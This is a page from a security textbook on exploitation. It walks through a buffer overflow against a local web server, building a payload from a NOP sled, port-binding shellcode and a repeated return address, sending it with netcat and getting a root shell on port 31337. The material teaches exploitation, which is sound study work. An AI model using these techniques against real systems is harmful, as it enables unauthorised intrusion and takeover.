Hacking - The Art of Exploitation, 2nd Edition

280 0x400

Even though the remote shell doesn’t display a prompt, it still accepts

commands and returns the output over the network.

A program like netcat can be used for many other things. It’s designed to

work like a console program, allowing standard input and output to be piped

and redirected. Using netcat and the port-binding shellcode in a file, the same

exploit can be carried out on the command line.

reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ echo $((540+4 - 300 - 92))
152
reader@hacking:~/booksrc $ echo $((152 / 4))
38
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300';

cat portbinding_shellcode
perl -e 'print "\x88\xf6\xff\xbf"x38. \r\n"')

jfX 1 CRj j jfXC
RfhzifSj QV fCCSV fCRRV j Y? Iy
Rh//shh/binRS 


reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38. "\r\n"') | nc -v -w1 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -v 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root

In the output above, first the length of the port-binding shellcode is

shown to be 92 bytes. The return address is found 540 bytes from the start of

the buffer, so with a 300-byte NOP sled and 92 bytes of shellcode, there are

152 bytes to the return address overwrite. This means that if the target return

address is repeated 38 times at the end of the buffer, the last one should do

the overwrite. Finally, the buffer is terminated with '\r\n'. The commands

that build the buffer are grouped with parentheses to pipe the buffer into

netcat. netcat connects to the tinyweb program and sends the buffer. After

the shellcode runs, netcat needs to be broken out of by pressing CTRL-C,

since the original socket connection is still open. Then, netcat is used again

to connect to the shell bound on port 31337.